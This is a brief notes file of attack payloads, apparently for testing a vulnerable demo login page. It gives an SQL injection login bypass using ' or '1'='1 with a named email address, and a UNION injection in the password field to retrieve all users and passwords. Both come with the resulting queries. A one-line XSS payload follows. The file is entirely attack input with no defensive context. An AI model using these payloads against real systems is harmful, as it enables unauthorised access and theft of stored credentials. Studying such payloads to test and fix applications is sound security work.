Payloads:

SQLi:
Logging without knowing the password:
	Username: sebastian.revuelta@kiuwan.com' or '1'='1
	Password: whatever

	Final query: select * from user where username = 'sebastian.revuelta@kiuwan.com' or '1'='1 and password = 'whatever';
	

Retrieving all users and passwords:
	Username: whatever
	Password: ' UNION select * from user where '1'='1

	Final query: select * from user where username = 'whatever' and password = '' UNION select * from user where '1'='1';

XSS:	
<svg onload=alert(1)>